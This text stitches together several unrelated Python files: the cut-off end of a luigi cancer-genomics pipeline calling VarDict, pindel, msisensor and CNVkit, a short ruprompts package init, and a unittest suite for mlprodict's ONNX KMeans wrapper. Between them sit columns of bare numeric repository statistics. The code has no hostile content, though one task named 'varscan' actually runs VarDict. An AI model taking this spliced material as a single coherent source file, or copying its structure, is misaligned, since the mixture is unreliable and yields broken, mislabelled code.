            cmd = ['./packages/VarDictJava/build/install/VarDict/bin/VarDict', '-G', self.cfg['fasta_file'], '-f', '0.01', '-N', self.case + '_T', '-b', '"%s|%s"' % (self.input()[0][0].path, self.input()[1][0].path), '-th', str(self.max_threads), '-z', '-c', '1', '-S', '2', '-E', '3', '-g', '4', self.cfg['library_bed'], '|', './packages/VarDictJava/VarDict/testsomatic.R', '|', './packages/VarDictJava/VarDict/var2vcf_paired.pl', '-N', '"%s|%s"' % (self.case + '_T', self.case + '_N'), '-f', '0.01', '>%s' % self.output().path]
        else:
            cmd = ['./packages/VarDictJava/build/install/VarDict/bin/VarDict', '-G', self.cfg['fasta_file'], '-f', '0.01', '-N', self.case + '_T', '-b', self.input()[0][0].path, '-th', str(self.max_threads), '-z', '-c', '1', '-S', '2', '-E', '3', '-g', '4', self.cfg['library_bed'], '|', './packages/VarDictJava/VarDict/teststrandbias.R', '|', './packages/VarDictJava/VarDict/var2vcf_valid.pl', '-N', self.case + '_T', '-E', '-f', '0.01', '>%s' % self.output().path]
        pipeline_utils.command_call(cmd, [self.output()], threads_needed=self.max_threads)
class sort_vardict(luigi.Task):
    """Sort the VarDict VCF with Picard SortVcf against the reference dictionary."""
    max_threads = luigi.IntParameter()
    project_dir = luigi.Parameter()
    case = luigi.Parameter()
    tumor = luigi.Parameter()
    matched_n = luigi.Parameter()
    vcf_path = luigi.Parameter()
    cfg = luigi.DictParameter()

    def requires(self):
        # [0] unsorted VarDict VCF, [1] Picard sequence dictionary.
        return [vardict(max_threads=self.max_threads, project_dir=self.project_dir, case=self.case, tumor=self.tumor, matched_n=self.matched_n, vcf_path=self.vcf_path, cfg=self.cfg),
        bam_processing.picard_index(cfg=self.cfg)]

    def output(self):
        return luigi.LocalTarget(os.path.join(self.vcf_path, self.case + '_vardict_sorted' + '.vcf'))

    def run(self):
        pipeline_utils.confirm_path(self.output().path)
        sort_args = ['java', '-jar', self.cfg['picard_location'], 'SortVcf']
        sort_args.append('I=%s' % self.input()[0].path)
        sort_args.append('O=%s' % self.output().path)
        sort_args.append('SEQUENCE_DICTIONARY=%s' % self.input()[1].path)
        pipeline_utils.command_call(sort_args, [self.output()], threads_needed=self.max_threads)
# NOTE(review): despite its name, this task currently duplicates the VarDict
# command pipeline rather than invoking VarScan ("this will be pretty annoying
# to get up and going"). A real VarScan integration is still TODO.
class varscan(luigi.Task):
    """Placeholder variant-calling task writing <vcf_path>/<case>_varscan.vcf.

    BUGFIX: the shell redirect previously pointed at
    os.path.join(vcf_path, 'vardict'), so the target declared by output()
    was never produced and command_call's output check could never pass;
    it now redirects to self.output().path. Also fixed a bare 'E' argument
    to '-E', matching the sibling vardict task's tumor-only command.
    """
    max_threads = luigi.IntParameter()
    project_dir = luigi.Parameter()
    case = luigi.Parameter()
    tumor = luigi.Parameter()
    matched_n = luigi.Parameter()
    vcf_path = luigi.Parameter()
    cfg = luigi.DictParameter()
    def requires(self):
        # Indexed tumor BAM, plus the normal BAM when a matched normal exists.
        if self.matched_n != '':
            return [bam_processing.index_bam(sample=self.case + '_T', fastq_file=self.tumor, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg), bam_processing.index_bam(sample=self.case + '_N', fastq_file=self.matched_n, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)]
        else:
            return [bam_processing.index_bam(sample=self.case + '_T', fastq_file=self.tumor, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)]
    def output(self):
        return luigi.LocalTarget(os.path.join(self.vcf_path, self.case + '_varscan' + '.vcf'))
    def run(self):
        pipeline_utils.confirm_path(self.output().path)
        if self.matched_n:
            cmd = ['./packages/VarDictJava/build/install/VarDict/bin/VarDict', '-G', self.cfg['fasta_file'], '-f', '0.01', '-N', self.case + '_T', '-b', '"%s|%s"' % (self.input()[0][0].path, self.input()[1][0].path), '-z', '-F', '-c', '1', '-S', '2', '-E', '3', '-g', '4', self.cfg['library_bed'], '|', './packages/VarDictJava/VarDict/testsomatic.R', '|', './packages/VarDictJava/VarDict/var2vcf_paired.pl', '-N', '"%s|%s"' % (self.case + '_T', self.case + '_N'), '-f', '0.01', '> %s' % self.output().path]
        else:
            cmd = ['./packages/VarDictJava/build/install/VarDict/bin/VarDict', '-G', self.cfg['fasta_file'], '-f', '0.01', '-N', self.case + '_T', '-b', self.input()[0][0].path, '-z', '-c', '1', '-S', '2', '-E', '3', '-g', '4', self.cfg['library_bed'], '|', './packages/VarDictJava/VarDict/teststrandbias.R', '|', './packages/VarDictJava/VarDict/var2vcf_valid.pl', '-N', self.case + '_T', '-E', '-f', '0.01', '> %s' % self.output().path]
        pipeline_utils.command_call(cmd, [self.output()])
class pindel(luigi.Task):
    """Run pindel jointly over every sample's BAM, producing one output file
    per structural-variant type under <project_dir>/output/pindel/.

    BUGFIX: ``-T`` previously received ``self.max_threads`` as an int; it is
    now stringified for consistency with the other command invocations in
    this file. The temporary BAM-list config is also removed in a ``finally``
    so it no longer lingers when pindel fails.
    """
    max_threads = luigi.IntParameter()
    project_dir = luigi.Parameter()
    case_dict = luigi.DictParameter()
    cfg = luigi.DictParameter()
    def requires(self):
        # Indexed BAMs: normals where a matched normal exists, plus every tumor.
        return [bam_processing.index_bam(sample=case_name + '_N', fastq_file=self.case_dict[case_name]['N'], project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg) for case_name in self.case_dict if self.case_dict[case_name]['N'] != ''] \
        + [bam_processing.index_bam(sample=case_name + '_T', fastq_file=self.case_dict[case_name]['T'], project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg) for case_name in self.case_dict]
    def output(self):
        # Deletions, short insertions, tandem duplications, inversions.
        pindel_files = ['_D', '_SI', '_TD', '_INV'] #, '_LI', '_BP',
        return [luigi.LocalTarget(os.path.join(self.project_dir, 'output', 'pindel', 'pindel_all_samples' + ext)) for ext in pindel_files]
    def run(self):
        for output in self.output():
            pipeline_utils.confirm_path(output.path)
        # pindel's -i config: one "<bam> <insert_size> <sample_label>" line per BAM.
        with open('___pindel_bams___.txt', 'w') as f:
            for input_bam in self.input():
                # Case name is the leading token of the BAM filename.
                case = input_bam[0].path.split('/')[-1].split('_')[0]
                if '_N' in input_bam[0].path:
                    f.write('%s %s %s\n' % (input_bam[0].path, self.cfg['insert_size'], case + '_N'))
                else:
                    f.write('%s %s %s\n' % (input_bam[0].path, self.cfg['insert_size'], case + '_T'))
        try:
            cmd = ['./packages/pindel/pindel', '-f', self.cfg['fasta_file'], '-i', '___pindel_bams___.txt', '-T', str(self.max_threads), '-c', 'ALL', '-o', os.path.join(self.project_dir, 'output', 'pindel', 'pindel_all_samples')]
            pipeline_utils.command_call(cmd, self.output(), threads_needed=self.max_threads)
        finally:
            # Clean up the temp config even if the pindel call raised.
            os.remove('___pindel_bams___.txt')
class filter_pindel(luigi.Task):
    """Filter raw pindel output into per-sample BEDs plus an all-samples TSV.

    The actual filtering lives in misc_utils.filter_pindel, thresholded by
    pindel_min_reads / pindel_min_qual / pindel_max_inv_length from cfg.
    """
    max_threads = luigi.IntParameter()
    project_dir = luigi.Parameter()
    case_dict = luigi.DictParameter()
    cfg = luigi.DictParameter()
    def requires(self):
        return pindel(case_dict=self.case_dict, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)
    def output(self):
        # Tumor BED per case, normal BED where a matched normal exists,
        # and the combined all-samples TSV last (run() relies on this order).
        return [luigi.LocalTarget(os.path.join(self.project_dir, 'output', case_name, 'variants', case_name + '_T.pindel.bed')) for case_name in self.case_dict] + \
        [luigi.LocalTarget(os.path.join(self.project_dir, 'output', case_name, 'variants', case_name + '_N.pindel.bed')) for case_name in self.case_dict if self.case_dict[case_name]['N'] != ''] + \
        [luigi.LocalTarget(os.path.join(self.project_dir, 'output', 'all_samples', 'all_samples_pindel.tsv'))]
    def run(self):
        for output in self.output():
            pipeline_utils.confirm_path(output.path)
        # Random stagger, then claim one slot from the global thread budget.
        wait_time = random.uniform(0,3)
        time.sleep(wait_time)
        sys.stdout.flush()
        while not pipeline_utils.add_thread_count(global_vars.thread_file, 1):
            time.sleep(1.2)
        # Map sample label (e.g. <case>_T) -> its BED path; excludes the trailing TSV.
        sample_dict = {output.path.split('/')[-1].split('.pindel.bed')[0]: output.path for output in self.output()[:-1]}
        misc_utils.filter_pindel(pindel_files=[input_file.path for input_file in self.input()], sample_dict=sample_dict, project_dir=self.project_dir, all_samples_output=self.output()[-1].path, min_reads=self.cfg['pindel_min_reads'], min_qual=self.cfg['pindel_min_qual'], max_inv_length=self.cfg['pindel_max_inv_length'])
        # Release the thread slot.
        while not pipeline_utils.sub_thread_count(global_vars.thread_file, 1):
            time.sleep(1.2)
class annotate_pindel(luigi.Task):
    """Annotate filtered pindel BEDs: keep exonic records and append map ids.

    For each per-sample BED from filter_pindel (every output except the
    trailing all-samples TSV) runs sort-bed | bedtools intersect | bedmap
    and writes a sibling *_final.bed.
    """
    max_threads = luigi.IntParameter()
    project_dir = luigi.Parameter()
    case_dict = luigi.DictParameter()
    cfg = luigi.DictParameter()
    def requires(self):
        return filter_pindel(case_dict=self.case_dict, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)
    def output(self):
        # One *_final.bed per per-sample BED; skip the trailing all-samples TSV.
        outputs = []
        for input_file in self.input()[:-1]:
            output_file = input_file.path.split('.bed')[0] + '_final.bed'
            outputs.append(luigi.LocalTarget(output_file))
        return outputs
    def run(self):
        for output in self.output():
            pipeline_utils.confirm_path(output.path)
        # Random stagger, then hold one global thread slot for the whole loop.
        wait_time = random.uniform(0,3)
        time.sleep(wait_time)
        sys.stdout.flush()
        while not pipeline_utils.add_thread_count(global_vars.thread_file, 1):
            time.sleep(1.2)
        for i, input_file in enumerate(self.input()[:-1]):
            # Stage 1: coordinate-sort the BED for the -sorted intersect below.
            cmd = 'sort-bed %s' % input_file.path
            p1 = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
            # Stage 2: keep only records overlapping the exon BED (-u: once each).
            cmd = ['bedtools', 'intersect', '-wa', '-u', '-sorted', '-a', 'stdin', '-b', self.cfg['exons_bed']]
            cmd = ' '.join(cmd)
            p2 = subprocess.Popen(cmd, stdout=subprocess.PIPE, stdin=p1.stdout, shell=True)
            # Stage 3: bedmap reads stdin ('-') and echoes each record plus unique
            # map ids from cfg['genmap']; the delimiter is passed quoted through the shell.
            cmd = ["bedmap", "--echo", "--echo-map-id-uniq", "--delim", r"'\t'", "-", self.cfg['genmap']]
            cmd = " ".join(cmd)
            p3 = subprocess.Popen(cmd, stdout=subprocess.PIPE, stdin=p2.stdout, shell=True)
            outs, err = p3.communicate()
            with open(self.output()[i].path, 'wb') as f:
                # '#gffTags' header line — presumably for genome-browser rendering
                # of gff-style name fields; confirm against the downstream viewer.
                f.write(str.encode('#gffTags\n'))
                f.write(outs)
        # Release the thread slot.
        while not pipeline_utils.sub_thread_count(global_vars.thread_file, 1):
            time.sleep(1.2)
class filter_pindel_old(luigi.Task):
    """Legacy pindel filter: grep variant records and threshold on supporting reads.

    Apparently superseded by filter_pindel (note the _old suffix); kept for reference.
    """
    max_threads = luigi.IntParameter()
    project_dir = luigi.Parameter()
    case_dict = luigi.DictParameter()
    cfg = luigi.DictParameter()
    def requires(self):
        return pindel(case_dict=self.case_dict, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)
    def output(self):
        # One filtered TSV alongside each raw pindel output file.
        return [luigi.LocalTarget(input_file.path + '.filtered.tsv') for input_file in self.input()]
    def run(self):
        for output in self.output():
            pipeline_utils.confirm_path(output.path)
        # Random stagger, then hold one global thread slot for the whole loop.
        wait_time = random.uniform(0,3)
        time.sleep(wait_time)
        sys.stdout.flush()
        while not pipeline_utils.add_thread_count(global_vars.thread_file, 1):
            time.sleep(1.2)
        for i, input_file in enumerate(self.input()):
            # 'ChrID' marks pindel's per-variant record lines.
            cmd = 'grep "ChrID" %s' % input_file.path #| awk '$17 >= 3' > $file_out
            p1 = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True)
            # Column 17 — presumably the supporting-read count; threshold from cfg.
            cmd = "awk '$17>=%s'" % self.cfg['pindel_min_reads']
            p2 = subprocess.Popen(cmd, stdout=subprocess.PIPE, stdin=p1.stdout, shell=True)
            outs, err = p2.communicate()
            with open(self.output()[i].path, 'wb') as f:
                f.write(outs)
        # Release the thread slot.
        while not pipeline_utils.sub_thread_count(global_vars.thread_file, 1):
            time.sleep(1.2)
class parse_pindel(luigi.Task):
    """Reformat filtered pindel results via misc_utils.format_pindel.

    NOTE(review): output() declares exactly the same targets as
    filter_pindel's output() — if both tasks are scheduled they claim the
    same files; confirm which one the pipeline actually uses.
    """
    max_threads = luigi.IntParameter()
    project_dir = luigi.Parameter()
    case_dict = luigi.DictParameter()
    cfg = luigi.DictParameter()
    def requires(self):
        return filter_pindel(case_dict=self.case_dict, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)
    def output(self):
        # Tumor BED per case, normal BED where a matched normal exists,
        # and the combined all-samples TSV last (run() relies on this order).
        return [luigi.LocalTarget(os.path.join(self.project_dir, 'output', case_name, 'variants', case_name + '_T.pindel.bed')) for case_name in self.case_dict] + \
        [luigi.LocalTarget(os.path.join(self.project_dir, 'output', case_name, 'variants', case_name + '_N.pindel.bed')) for case_name in self.case_dict if self.case_dict[case_name]['N'] != ''] + \
        [luigi.LocalTarget(os.path.join(self.project_dir, 'output', 'all_samples', 'all_samples_pindel.tsv'))]
    def run(self):
        for output in self.output():
            pipeline_utils.confirm_path(output.path)
        # Random stagger, then claim one slot from the global thread budget.
        wait_time = random.uniform(0,3)
        time.sleep(wait_time)
        sys.stdout.flush()
        while not pipeline_utils.add_thread_count(global_vars.thread_file, 1):
            time.sleep(1.2)
        # Map sample label (e.g. <case>_T) -> its BED path; excludes the trailing TSV.
        sample_dict = {output.path.split('/')[-1].split('.pindel.bed')[0]: output.path for output in self.output()[:-1]}
        misc_utils.format_pindel(pindel_files=[input_file.path for input_file in self.input()], sample_dict=sample_dict, project_dir=self.project_dir, all_samples_output=self.output()[-1].path, min_reads=self.cfg['pindel_min_reads'])
        # Release the thread slot.
        while not pipeline_utils.sub_thread_count(global_vars.thread_file, 1):
            time.sleep(1.2)
class pindel2vcf(luigi.Task):
    """Convert the joint pindel output files into a single multi-sample VCF."""
    max_threads = luigi.IntParameter()
    project_dir = luigi.Parameter()
    case_dict = luigi.DictParameter()
    cfg = luigi.DictParameter()

    def requires(self):
        return pindel(case_dict=self.case_dict, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)

    def output(self):
        return luigi.LocalTarget(os.path.join(self.project_dir, 'output', 'pindel', 'pindel_all_samples.vcf'))

    def run(self):
        # Drop the per-type suffix (_D, _SI, ...) from the first input to
        # recover the shared prefix that pindel2vcf's -P expects.
        first_input = self.input()[0].path
        shared_prefix = '_'.join(first_input.split('_')[:-1])
        pipeline_utils.confirm_path(self.output().path)
        cmd = ['./packages/pindel/pindel2vcf', '-r', self.cfg['fasta_file'], '-G', '-R', self.cfg['base_name'], '-d', 'idk', '-P', shared_prefix, '-v', self.output().path]
        pipeline_utils.command_call(cmd, [self.output()])
class msisensor(luigi.Task):
    """Score microsatellite instability for the tumor sample with msisensor."""
    max_threads = luigi.IntParameter()
    project_dir = luigi.Parameter()
    case = luigi.Parameter()
    tumor = luigi.Parameter()
    matched_n = luigi.Parameter()
    vcf_path = luigi.Parameter()
    cfg = luigi.DictParameter()

    def requires(self):
        return bam_processing.index_bam(sample=self.case + '_T', fastq_file=self.tumor, project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg)

    def output(self):
        return luigi.LocalTarget(os.path.join(self.vcf_path, self.case + '_T.msisensor'))

    def run(self):
        out_target = self.output()
        pipeline_utils.confirm_path(out_target.path)
        tumor_bam = self.input()[0].path
        # Run single-threaded (no -b flag, no threads_needed reservation).
        cmd = ['./packages/msisensor/binary/msisensor.linux', 'msi', '-d', './packages/msisensor/microsatellites.list', '-t', tumor_bam, '-e', self.cfg['library_bed'], '-o', out_target.path]
        pipeline_utils.command_call(cmd, [out_target])
class cnvkit(luigi.Task):
    """Run CNVkit batch copy-number calling over all tumor BAMs, pooling the
    normals into a reference, under <project_dir>/output/cnvkit/.

    BUGFIX: ``-p`` previously received ``self.max_threads`` as an int; it is
    now stringified for consistency with the other command invocations in
    this file (e.g. scalpel's ``--numprocs``).
    """
    max_threads = luigi.IntParameter()
    project_dir = luigi.Parameter()
    case_dict = luigi.DictParameter()
    cfg = luigi.DictParameter()
    def requires(self):
        # Indexed BAMs: normals where a matched normal exists, plus every tumor.
        return [bam_processing.index_bam(sample=case_name + '_N', fastq_file=self.case_dict[case_name]['N'], project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg) for case_name in self.case_dict if self.case_dict[case_name]['N'] != ''] \
        + [bam_processing.index_bam(sample=case_name + '_T', fastq_file=self.case_dict[case_name]['T'], project_dir=self.project_dir, max_threads=self.max_threads, cfg=self.cfg) for case_name in self.case_dict]
    def output(self):
        # Pooled reference, then per-tumor .cnr/.cns and coverage files,
        # plus normal coverage files where a matched normal exists.
        return [luigi.LocalTarget(os.path.join(self.project_dir, 'output', 'cnvkit', 'reference', 'reference.cnn'))] \
        + [luigi.LocalTarget(os.path.join(self.project_dir, 'output', 'cnvkit', 'variants', '%s_T_recalibrated.cnr' % case_name)) for case_name in self.case_dict] \
        + [luigi.LocalTarget(os.path.join(self.project_dir, 'output', 'cnvkit', 'variants', '%s_T_recalibrated.cns' % case_name)) for case_name in self.case_dict] \
        + [luigi.LocalTarget(os.path.join(self.project_dir, 'output', 'cnvkit', 'variants', '%s_T_recalibrated.targetcoverage.cnn' % case_name)) for case_name in self.case_dict] \
        + [luigi.LocalTarget(os.path.join(self.project_dir, 'output', 'cnvkit', 'variants', '%s_T_recalibrated.antitargetcoverage.cnn' % case_name)) for case_name in self.case_dict] \
        + [luigi.LocalTarget(os.path.join(self.project_dir, 'output', 'cnvkit', 'variants', '%s_N_recalibrated.targetcoverage.cnn' % case_name)) for case_name in self.case_dict if self.case_dict[case_name]['N'] != ''] \
        + [luigi.LocalTarget(os.path.join(self.project_dir, 'output', 'cnvkit', 'variants', '%s_N_recalibrated.antitargetcoverage.cnn' % case_name)) for case_name in self.case_dict if self.case_dict[case_name]['N'] != '']
    def run(self):
        for output in self.output():
            pipeline_utils.confirm_path(output.path)
        # Glob patterns pick up the recalibrated tumor/normal BAMs directly,
        # so the command does not enumerate self.input().
        cmd = ['python3', './packages/cnvkit/cnvkit.py', 'batch', os.path.join(self.project_dir, 'output', '*', 'alignment', '*T*recalibrated.bam'), '--normal', os.path.join(self.project_dir, 'output', '*', 'alignment', '*N*recalibrated.bam'), '--targets', self.cfg['library_bed'], '--fasta', self.cfg['fasta_file'], '--output-reference', self.output()[0].path, '--output-dir', os.path.join(self.project_dir, 'output', 'cnvkit', 'variants'), '--diagram', '--scatter', '--rlibpath', './packages/R', '--annotate', './packages/cnvkit/data/refFlat_b37.txt', '--drop-low-coverage', '-p', str(self.max_threads)]
        pipeline_utils.command_call(cmd, self.output(), threads_needed=self.max_threads)
| 48.33844
| 594
| 0.702711
| 5,096
| 34,707
| 4.589286
| 0.057692
| 0.081413
| 0.038312
| 0.025741
| 0.904862
| 0.897037
| 0.891949
| 0.889383
| 0.873348
| 0.862359
| 0
| 0.0088
| 0.106175
| 34,707
| 717
| 595
| 48.405858
| 0.745084
| 0.164232
| 0
| 0.718468
| 0
| 0
| 0.149946
| 0.05305
| 0
| 0
| 0
| 0
| 0
| 1
| 0.135135
| false
| 0.006757
| 0.024775
| 0.072072
| 0.572072
| 0.002252
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
99f928d43051cdad79c8075f0cafc9ceccd47e51
| 352
|
py
|
Python
|
ruprompts/__init__.py
|
sberbank-ai/ru-prompts
|
4eeedae92cb5234c70adc787ace7cfceb76b0be0
|
[
"Apache-2.0"
] | 30
|
2021-12-17T07:05:10.000Z
|
2022-02-22T09:38:35.000Z
|
ruprompts/__init__.py
|
sberbank-ai/ru-prompts
|
4eeedae92cb5234c70adc787ace7cfceb76b0be0
|
[
"Apache-2.0"
] | null | null | null |
ruprompts/__init__.py
|
sberbank-ai/ru-prompts
|
4eeedae92cb5234c70adc787ace7cfceb76b0be0
|
[
"Apache-2.0"
] | 2
|
2022-01-04T01:36:48.000Z
|
2022-01-04T02:00:24.000Z
|
from ruprompts.pipelines import (
Text2TextGenerationWithPromptPipeline,
TextGenerationWithPromptPipeline,
)
from ruprompts.preprocessing import Text2TextPreprocessor
from ruprompts.prompt import MultiPrompt, Prompt
from ruprompts.prompt_format import PromptFormat
from ruprompts.prompt_provider import LSTMPromptProvider, TensorPromptProvider
| 39.111111
| 78
| 0.875
| 30
| 352
| 10.2
| 0.5
| 0.212418
| 0.186275
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00627
| 0.09375
| 352
| 8
| 79
| 44
| 0.952978
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.625
| 0
| 0.625
| 0
| 0
| 0
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
413937787fb2463aa5bca94811628297c341550c
| 7,760
|
py
|
Python
|
_unittests/ut_sklapi/test_onnx_speedup_cluster.py
|
sdpython/mlprodic
|
9367dacc91d35ec670c8a8a76708300a75bbc993
|
[
"MIT"
] | 32
|
2018-03-04T23:33:30.000Z
|
2022-03-10T19:15:06.000Z
|
_unittests/ut_sklapi/test_onnx_speedup_cluster.py
|
sdpython/mlprodic
|
9367dacc91d35ec670c8a8a76708300a75bbc993
|
[
"MIT"
] | 184
|
2017-11-30T14:10:35.000Z
|
2022-02-21T08:29:31.000Z
|
_unittests/ut_sklapi/test_onnx_speedup_cluster.py
|
sdpython/mlprodic
|
9367dacc91d35ec670c8a8a76708300a75bbc993
|
[
"MIT"
] | 9
|
2019-07-24T13:18:00.000Z
|
2022-03-07T04:08:07.000Z
|
"""
@brief test log(time=5s)
"""
from io import BytesIO
import pickle
import unittest
from logging import getLogger
import numpy
from numba import NumbaWarning
# import pandas
# from sklearn.pipeline import make_pipeline
from sklearn.exceptions import ConvergenceWarning
from sklearn.cluster import KMeans
from sklearn.datasets import load_iris
from pyquickhelper.pycode import ExtTestCase, ignore_warnings
from mlprodict.sklapi import OnnxSpeedupCluster
from mlprodict.tools import get_opset_number_from_onnx
from mlprodict.onnx_conv import to_onnx
from mlprodict.onnxrt import OnnxInference
class TestOnnxSpeedupCluster(ExtTestCase):
    """Tests for OnnxSpeedupCluster wrapping KMeans(n_clusters=3) on iris.

    Covers float32 and float64 conversion, the python / onnxruntime / numpy /
    numba runtimes, pickle round-trips, and re-conversion of the fitted
    speedup object back to ONNX.
    """
    def setUp(self):
        # skl2onnx logging is noisy during conversion; silence it for every test.
        logger = getLogger('skl2onnx')
        logger.disabled = True
    def opset(self):
        # Target opset shared by all tests: the highest known to the installed onnx.
        return get_opset_number_from_onnx()
    @ignore_warnings(ConvergenceWarning)
    def test_speedup_kmeans32(self):
        # Default runtime, float32 inputs.
        data = load_iris()
        X, y = data.data, data.target
        spd = OnnxSpeedupCluster(
            KMeans(n_clusters=3), target_opset=self.opset())
        spd.fit(X, y)
        spd.assert_almost_equal(X, decimal=4)
    @ignore_warnings(ConvergenceWarning)
    def test_speedup_kmeans32_onnxruntime(self):
        data = load_iris()
        X, y = data.data, data.target
        spd = OnnxSpeedupCluster(
            KMeans(n_clusters=3), target_opset=self.opset(),
            runtime="onnxruntime1")
        spd.fit(X, y)
        spd.assert_almost_equal(X, decimal=4)
    @ignore_warnings(ConvergenceWarning)
    def test_speedup_kmeans32_numpy(self):
        data = load_iris()
        X, y = data.data, data.target
        spd = OnnxSpeedupCluster(
            KMeans(n_clusters=3), target_opset=self.opset(),
            runtime="numpy")
        spd.fit(X, y)
        spd.assert_almost_equal(X, decimal=4)
    @ignore_warnings((ConvergenceWarning, NumbaWarning))
    def test_speedup_kmeans32_numba(self):
        data = load_iris()
        X, y = data.data, data.target
        # numba runtime requires float32 input here.
        X = X.astype(numpy.float32)
        spd = OnnxSpeedupCluster(
            KMeans(n_clusters=3), target_opset=self.opset(),
            runtime="numba", nopython=False)
        spd.fit(X, y)
        spd.assert_almost_equal(X, decimal=4)
        # Confirms the inner function was actually numba-compiled.
        self.assertIn("CPUDispatch", str(spd.onnxrt_.func))
    @ignore_warnings(ConvergenceWarning)
    def test_speedup_kmeans64(self):
        # enforce_float32=False keeps double precision end to end.
        data = load_iris()
        X, y = data.data, data.target
        spd = OnnxSpeedupCluster(
            KMeans(n_clusters=3), target_opset=self.opset(),
            enforce_float32=False)
        spd.fit(X, y)
        spd.assert_almost_equal(X)
    @ignore_warnings(ConvergenceWarning)
    def test_speedup_kmeans64_op_version(self):
        data = load_iris()
        X, y = data.data, data.target
        spd = OnnxSpeedupCluster(
            KMeans(n_clusters=3), target_opset=self.opset(),
            enforce_float32=False)
        spd.fit(X, y)
        # The model's recorded default-domain opset must not exceed the target.
        opset = spd.op_version
        self.assertGreater(self.opset(), opset[''])
    @ignore_warnings(ConvergenceWarning)
    def test_speedup_kmeans64_pickle(self):
        # Pickle round-trip: predictions must be identical before and after.
        data = load_iris()
        X, y = data.data, data.target
        spd = OnnxSpeedupCluster(
            KMeans(n_clusters=3), target_opset=self.opset(),
            enforce_float32=False)
        spd.fit(X, y)
        st = BytesIO()
        pickle.dump(spd, st)
        st2 = BytesIO(st.getvalue())
        spd2 = pickle.load(st2)
        expected = spd.predict(X)
        got = spd2.predict(X)
        self.assertEqualArray(expected, got)
        expected = spd.raw_predict(X)
        got = spd2.raw_predict(X)
        self.assertEqualArray(expected, got)
    @ignore_warnings(ConvergenceWarning)
    def test_speedup_kmeans64_numpy_pickle(self):
        data = load_iris()
        X, y = data.data, data.target
        spd = OnnxSpeedupCluster(
            KMeans(n_clusters=3), target_opset=self.opset(),
            enforce_float32=False, runtime="numpy")
        spd.fit(X, y)
        st = BytesIO()
        pickle.dump(spd, st)
        st2 = BytesIO(st.getvalue())
        spd2 = pickle.load(st2)
        expected = spd.predict(X)
        got = spd2.predict(X)
        self.assertEqualArray(expected, got)
        expected = spd.raw_predict(X)
        got = spd2.raw_predict(X)
        self.assertEqualArray(expected, got)
    @ignore_warnings((ConvergenceWarning, NumbaWarning))
    def test_speedup_kmeans64_numba_pickle(self):
        data = load_iris()
        X, y = data.data, data.target
        spd = OnnxSpeedupCluster(
            KMeans(n_clusters=3), target_opset=self.opset(),
            enforce_float32=False, runtime="numba", nopython=False)
        spd.fit(X, y)
        st = BytesIO()
        pickle.dump(spd, st)
        st2 = BytesIO(st.getvalue())
        spd2 = pickle.load(st2)
        expected = spd.predict(X)
        got = spd2.predict(X)
        self.assertEqualArray(expected, got)
        expected = spd.raw_predict(X)
        got = spd2.raw_predict(X)
        self.assertEqualArray(expected, got)
    @ignore_warnings(ConvergenceWarning)
    def test_speedup_kmeans64_onnx(self):
        # Convert the fitted speedup object itself to ONNX and compare
        # OnnxInference results against sklearn-side predict/transform.
        data = load_iris()
        X, y = data.data, data.target
        spd = OnnxSpeedupCluster(
            KMeans(n_clusters=3), target_opset=self.opset(),
            enforce_float32=False)
        spd.fit(X, y)
        expected_label = spd.predict(X)
        expected_score = spd.transform(X)
        onx = to_onnx(spd, X[:1])
        oinf = OnnxInference(onx)
        got = oinf.run({'X': X})
        self.assertEqualArray(expected_score, got['scores'])
        self.assertEqualArray(expected_label, got['label'])
    @ignore_warnings(ConvergenceWarning)
    def test_speedup_kmeans64_onnx_numpy(self):
        data = load_iris()
        X, y = data.data, data.target
        spd = OnnxSpeedupCluster(
            KMeans(n_clusters=3), target_opset=self.opset(),
            enforce_float32=False, runtime='numpy')
        spd.fit(X, y)
        expected_label = spd.predict(X)
        expected_score = spd.transform(X)
        onx = to_onnx(spd, X[:1])
        oinf = OnnxInference(onx)
        got = oinf.run({'X': X})
        self.assertEqualArray(expected_score, got['scores'])
        self.assertEqualArray(expected_label, got['label'])
    @ignore_warnings((ConvergenceWarning, NumbaWarning))
    def test_speedup_kmeans64_onnx_numba(self):
        data = load_iris()
        X, y = data.data, data.target
        spd = OnnxSpeedupCluster(
            KMeans(n_clusters=3), target_opset=self.opset(),
            enforce_float32=False, runtime='numba', nopython=False)
        spd.fit(X, y)
        expected_label = spd.predict(X)
        expected_score = spd.transform(X)
        onx = to_onnx(spd, X[:1])
        oinf = OnnxInference(onx)
        got = oinf.run({'X': X})
        self.assertEqualArray(expected_score, got['scores'])
        self.assertEqualArray(expected_label, got['label'])
    @ignore_warnings((ConvergenceWarning, NumbaWarning))
    def test_speedup_kmeans64_onnx_numba_python(self):
        data = load_iris()
        X, y = data.data, data.target
        spd = OnnxSpeedupCluster(
            KMeans(n_clusters=3), target_opset=self.opset(),
            enforce_float32=False, runtime='numba', nopython=False)
        spd.fit(X, y)
        expected_label = spd.predict(X)
        expected_score = spd.transform(X)
        onx = to_onnx(spd, X[:1])
        oinf = OnnxInference(onx)
        got = oinf.run({'X': X})
        self.assertEqualArray(expected_score, got['scores'])
